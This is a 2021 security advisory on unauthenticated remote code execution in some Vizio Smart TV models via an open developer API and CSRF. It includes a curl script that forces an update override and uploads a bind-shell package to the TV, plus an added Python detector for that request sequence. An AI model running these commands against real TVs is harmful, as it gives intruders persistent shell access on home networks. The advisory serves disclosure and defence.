Unauthenticated Remote Code Execution on Vizio Smart TV

Advisory ID: L9-44-476
Published: June 28, 2021
Updated: August 19, 2021
Category: Command Injection
Vendor: Vizio
Product: 2018 P65-F1, 2017 E50x-E1
Version: 6.0.31.4-2, 10.0.31.4-2

Risk Summary

A remote code execution vulnerability is present in several Vizio Smart TV models. A threat actor on the local network, or one reaching a Vizio TV exposed to the internet, can exploit the device with no pre-conditions to obtain OS-level command execution on the TV and maintain persistence. From this position, a threat actor can lie dormant on the TV and attack neighboring assets. The Vizio TV API, used primarily for control through the mobile web application, accepts unauthenticated developer commands, including commands to upload and execute a binary file. The network-based attack can be launched against any Vizio TV connected to Wi-Fi, LAN, or the internet without any user interaction; a second means of exploitation is a CSRF-based attack, which is possible because of the API's open cross-origin resource sharing (CORS) policy. A malicious CSRF request could be crafted and sent to a victim on the same network as the TV, and the TV is exploited as soon as the victim interacts with the link.

Technical Details

The researcher performed the following procedure to upload a bind shell to the Vizio TV:

####################
### remote_install.sh ###
####################

HOST="192.168.1.175"
PORT=7345

# Place the device into a new override group
curl -k -s https://${HOST}:${PORT}/scpl/update/override_group -d "device_group=oobe-2020-dev"

# Check for new updates
curl -k -s https://${HOST}:${PORT}/scpl/update/available_update_info -d ""

# Force a device update
curl -k -s https://${HOST}:${PORT}/scpl/update/start_update -d ""

# Upload and install binary file
curl -k -s https://${HOST}:${PORT}/scpl/install -H "Expect:" -F "[email protected]_shell.tar.gz;type=application/x-gzip" -F "Install=Install"

#######################
### bind_shell.tar.gz ###
#######################
- bind_static (static bind shell - listens on port 4444)
- install.sh

###############
#### install.sh ####
###############
#!/bin/sh
echo "[*] Starting reverse shell"
/data/tv/tmp/scpl_install/reverse_static &

echo "[*] Expect a connection on port 4444"
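The procedure above touches four API endpoints in a fixed order (override_group, available_update_info, start_update, install), which gives a defender a sequence to watch for on port 7345. The following detection script is an added example written for this page; it is not the researcher's code and is not part of the advisory. It correlates requests per client/TV pair and raises an alert when one client walks the whole sequence, or when any client posts to /scpl/install or /scpl/update/override_group on its own. The log line format and the sample traffic are constructed for the example and do not correspond to any real Vizio or proxy log format; the endpoint paths and the port come from the advisory.

```python
import re
from collections import defaultdict
from typing import Dict, Iterable, List, Optional, Tuple

# Endpoints named in the advisory's remote_install.sh, in the order that script calls them.
EXPLOIT_SEQUENCE: List[str] = [
    "/scpl/update/override_group",
    "/scpl/update/available_update_info",
    "/scpl/update/start_update",
    "/scpl/install",
]

# Constructed log format for this example (not a real Vizio or proxy log format):
#   <timestamp> <src_ip> <dst_ip>:<dst_port> <method> <path> <status>
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) (?P<dst>\S+):(?P<port>\d+) "
    r"(?P<method>[A-Z]+) (?P<path>\S+) (?P<status>\d{3})$"
)

# Constructed sample traffic: one host walks the full sequence against a TV on
# port 7345; a second host makes a lone upload attempt that the TV rejects.
SAMPLE_LOG = """\
2021-06-28T10:00:01Z 192.168.1.50 192.168.1.175:7345 POST /scpl/update/override_group 200
2021-06-28T10:00:02Z 192.168.1.50 192.168.1.175:7345 POST /scpl/update/available_update_info 200
2021-06-28T10:00:03Z 192.168.1.50 192.168.1.175:7345 POST /scpl/update/start_update 200
2021-06-28T10:00:09Z 192.168.1.50 192.168.1.175:7345 POST /scpl/install 200
2021-06-28T10:05:00Z 192.168.1.20 192.168.1.175:7345 GET /unrelated/endpoint 200
2021-06-28T10:06:00Z 192.168.1.20 192.168.1.175:7345 POST /scpl/install 403
"""


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Parse one constructed log line; return None for lines that do not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def detect(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Correlate /scpl/ requests per (src, dst) pair and return alerts.

    Severity ladder:
      medium   - a client moved the TV into an override update group
      high     - a client posted to /scpl/install outside the full sequence
      critical - one client completed the whole override -> install sequence
    """
    progress: Dict[Tuple[str, str], int] = defaultdict(int)
    alerts: List[Dict[str, str]] = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]
        if path not in EXPLOIT_SEQUENCE:
            continue
        key = (rec["src"], rec["dst"])
        step = EXPLOIT_SEQUENCE.index(path)
        # Advance the state machine only when this is the next expected step;
        # a fresh override_group call restarts the sequence for that pair.
        if step == progress[key]:
            progress[key] += 1
        elif step == 0:
            progress[key] = 1
        base = {"ts": rec["ts"], "src": rec["src"], "dst": rec["dst"], "status": rec["status"]}
        if progress[key] == len(EXPLOIT_SEQUENCE):
            alerts.append({**base, "severity": "critical",
                           "reason": "full update-override and binary install sequence"})
            progress[key] = 0
        elif path == "/scpl/install":
            alerts.append({**base, "severity": "high",
                           "reason": "binary upload attempt to /scpl/install"})
        elif path == "/scpl/update/override_group":
            alerts.append({**base, "severity": "medium",
                           "reason": "TV moved into override update group"})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_LOG.splitlines()):
        print(f"{a['ts']} {a['severity']:8} {a['src']} -> {a['dst']} ({a['status']}): {a['reason']}")
```

Rejected attempts (the 403 line) are still reported, since a failed upload from a workstation is worth investigating on its own; the sequence tracking is keyed on the client/TV pair so that unrelated hosts do not complete each other's chain.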

Figure: Device info for 2018 P65-F1

Figure: Remote Install on 2018 P65-F1. The remote installer script forces the TV into a new override group, then uploads a bind shell.

Figure: Device info for 2017 E50x-E1

Figure: CSRF on 2017 E50x-E1. The payload is delivered using cross-site request forgery.

Figure: Remote Shell on 2017 E50x-E1. The TV connects back to a listening machine through a reverse shell.